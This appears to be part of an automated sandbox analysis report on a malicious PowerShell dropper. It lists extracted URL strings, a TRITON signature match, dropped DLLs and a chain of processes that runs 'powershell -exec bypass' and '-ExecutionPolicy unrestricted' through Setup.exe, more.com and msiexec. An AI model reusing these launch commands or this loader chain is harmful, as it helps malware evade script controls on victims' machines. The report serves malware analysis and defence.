                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.icq.com/cf/icqmapIYou
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wwp.icq.com/%UinStr%
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wwp.icq.com/%dBThe
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wwp.icq.com/%sGSending
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.avast.com0/
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA127000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA0F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.developershome.com/7-zip/
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.globalsign.net/repository/03
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.icq.americangreetings.com/icqorder.pd?mode=send&design=%s&title=%s&recipient=%s&text=%s&s
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.icq.com
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.icq.com.
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.icq.com/cf/icqlite/connection.html
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.icq.com/download
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.icq.com/download/NYou
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06A83000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.00000256401FC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                    Source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.phreedom.org/md5)
                    Source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.phreedom.org/md5)08:27
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198B996B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B999E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.prizeeinternational.com
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                    Source: Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00

                    System Summary

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Dropped file: MD5: 9a7234078559093e06c9d32148ed95a3
                    Family: TRITON
                    Alias: TEMP.Veles, TRISIS, XENOTIME, HATMAN, TRITON
                    Description: TRITON, named by FireEye, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. It is one of a limited number of publicly identified malicious software families targeted at industrial control systems (ICS). It could prevent safety mechanisms from executing their intended function, resulting in a physical consequence. When the attacker gained remote access to an SIS engineering workstation, the TRITON attack framework was deployed to reprogram the SIS controllers, to modify application memory on SIS controllers that could lead to a failed validation check.
                    References:
                    https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
                    https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
                    https://dragos.com/adversaries.html
                    https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html
                    Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1BE0DF07_2_00007FFBA1BE0DF0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1E337_2_00007FFBA1AD1E33
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1BE10407_2_00007FFBA1BE1040
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD26F87_2_00007FFBA1AD26F8
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD12AD7_2_00007FFBA1AD12AD
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD24AF7_2_00007FFBA1AD24AF
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD26087_2_00007FFBA1AD2608
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1ABE7_2_00007FFBA1AD1ABE
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B754507_2_00007FFBA1B75450
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD17B77_2_00007FFBA1AD17B7
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD18667_2_00007FFBA1AD1866
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1C835A07_2_00007FFBA1C835A0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1E6A7_2_00007FFBA1AD1E6A
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD244B7_2_00007FFBA1AD244B
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1AC37_2_00007FFBA1AD1AC3
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD11CC7_2_00007FFBA1AD11CC
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1B637_2_00007FFBA1AD1B63
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B879F07_2_00007FFBA1B879F0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1B407_2_00007FFBA1AD1B40
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD13437_2_00007FFBA1AD1343
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1D1B7_2_00007FFBA1AD1D1B
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD22207_2_00007FFBA1AD2220
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B7DB307_2_00007FFBA1B7DB30
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1FC37_2_00007FFBA1AD1FC3
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B29E907_2_00007FFBA1B29E90
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B7DE407_2_00007FFBA1B7DE40
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD22E87_2_00007FFBA1AD22E8
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD25277_2_00007FFBA1AD2527
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B780907_2_00007FFBA1B78090
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD11187_2_00007FFBA1AD1118
                    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\DUC\libcrypto-1_1-x64.dll 52415829D85C06DF8724A3D3D00C98F12BEABF5D6F3CBAD919EC8000841A86E8
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: String function: 00007FFBA1AD1BD6 appears 44 times
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: String function: 00007FFBA1AD401B appears 141 times
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: String function: 00007FFBA1AD1055 appears 429 times
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: String function: 00007FFBA1AD5C77 appears 237 times
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: String function: 00007FFBA1AD4593 appears 36 times
                    Source: lang-1058.dll.1.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM)
                    Source: libvlc.dll.1.dr Static PE information: Number of sections : 12 > 10
                    Source: libvlccore.dll.1.dr Static PE information: Number of sections : 12 > 10
                    Source: api-ms-win-core-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-process-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: lang-1049.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-profile-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-util-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-math-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-private-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: lang-1058.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
                    Source: LiteRes.dll.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Qt5Core.dll.1.dr Static PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
                    Source: Qt5Core.dll.4.dr Static PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winPS1@19/176@2/2
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: 4_2_00007FFBA1A46E00 ?shared_null@QListData@@2UData@1@B,CertOpenSystemStoreW,CertFindCertificateInStore,??0QByteArray@@QEAA@PEBDH@Z,?append@QListData@@QEAAPEAPEAXXZ,??1QByteArray@@QEAA@XZ,CertFindCertificateInStore,CertCloseStore
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: 4_2_00007FFBA19FF1A0 CoCreateInstance,?isWarningEnabled@QLoggingCategory@@QEBA_NXZ,??0QMessageLogger@@QEAA@PEBDH00@Z,?warning@QMessageLogger@@QEBA?AVQDebug@@XZ,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@AEBVQString@@@Z,??1QString@@QEAA@XZ,??1QDebug@@QEAA@XZ,?isWarningEnabled@QLoggingCategory@@QEBA_NXZ,??0QMessageLogger@@QEAA@PEBDH00@Z,?warning@QMessageLogger@@QEBA?AVQDebug@@XZ,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@AEBVQString@@@Z,??1QString@@QEAA@XZ,??1QDebug@@QEAA@XZ,?isWarningEnabled@QLoggingCategory@@QEBA_NXZ,??0QMessageLogger@@QEAA@PEBDH00@Z,?warning@QMessageLogger@@QEBA?AVQDebug@@XZ,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@AEBVQString@@@Z,??1QString@@QEAA@XZ,??1QDebug@@QEAA@XZ
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\HuXYHwrC.zip
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1736:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oa1sukry.yfu.ps1
                    Source: Yara match File source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dll, type: DROPPED
                    Source: Yara match File source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bpl, type: DROPPED
                    Source: Yara match File source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dll, type: DROPPED
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: qt5core.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: steam_api64.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: msvcp140.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: vcruntime140.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: vcruntime140_1.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: libcrypto-1_1-x64.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: qt5network.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: dbghelp.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: libssl-1_1-x64.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: msvcp140.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: msvcp140_1.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: vcruntime140.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: vcruntime140_1.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: shdocvw.dll
                    Source: C:\Windows\SysWOW64\more.com Section loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\more.com Section loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\more.com Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: shdocvw.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: xaSPJNbl.ps1 Static file information: File size 47033442 > 1048576
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: Setup.exe, 00000004.00000003.1903835083.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.2044770209.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000007.00000002.2085414094.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: Setup.exe, 00000004.00000003.1903835083.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.2044770209.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000007.00000002.2085414094.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1s 1 Nov 2022built on: Fri Feb 3 01:12:04 2023 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\dist\pc64_dll_release\lib\engines-1_1"not available source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: d:\Develop\dev-Milky\libs\mfclibs\ICQSkinUtils\ICQSkinUtils\_dmt\LiteSkinUtils.pdbWW source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: Setup.exe, 00000004.00000002.2052868230.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp, Setup.exe, 00000007.00000002.2086323457.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: wntdll.pdbUGP source: more.com, 00000008.00000002.2013062507.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013369968.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libcrypto-1_1-x64.pdb source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1D15000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04687000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1D15000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000003.1994011222.000002563DEF0000.00000004.00000020.00020000.00000000.sdmp
